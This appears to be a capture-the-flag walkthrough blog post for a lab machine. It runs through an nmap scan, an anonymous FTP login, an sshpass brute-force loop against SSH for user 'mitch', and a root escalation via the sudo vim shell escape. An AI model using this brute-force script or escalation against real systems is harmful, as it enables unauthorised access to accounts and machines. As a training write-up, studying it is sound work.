Files used in this blog are here
Port scan ๐
First we start by scanning the ports
nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
-p1-
means all ports
-T4
is for an aggressive scan
--min-rate 5000
is used to tell how many packages per second are we sending
-vvv
is verbose
-o
is for file output
# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
2222/tcp open EtherNetIP-1 syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds
FTP Anonymous login ๐คฟ
Now since there is a port open at 21, we can try to do a anonymous login.
ftp 10.10.226.232
Connected to 10.10.226.232.
220 (vsFTPd 3.0.3)
Name (10.10.226.232:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Now we are inside! We can verify by running a command like ls
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>
If we see something like passive mode, just type passive
and will enter active mode.
If we dig inside the folder pub
there is a file called ForMitch.txt
we are going to download that with get <file_name>
And in our local computer we do a cat <file_name>
We got the following response
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Brute force ๐
So we know that their user is the same for the system and that contains a weak password
Since the message mentions a name we are going to asume that the user is mitch, now we should try to brute force the password.
I'm going to use a package called sshpass
in order to send the password from a wordlist that I got from internet and create a simple script like this
#!/bin/bash
for password in $(cat weak_passwords.txt); do
echo "Trying password: $password"
sshpass -p$password ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes mitch@10.10.226.232
done
After a long time trying I got the password!
Obtain the flags ๐
If we do a ls
we can see that the user.txt
flag is there, take it and continue!
One of the first things you always do in a system (even before trying things like linpeas) is to do a simple sudo -l
to see if there is something that can be run with sudo.
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
And of course there he's, we can use sudo vim
Lets do a sudo vim
then type :
and after ! ls /root
and press enter, with this we are going to see if the root flag is there.
$ sudo vim
root.txt
And there it is! just like before but this time with ! cat /root/root.txt
Congratulations you got your flag!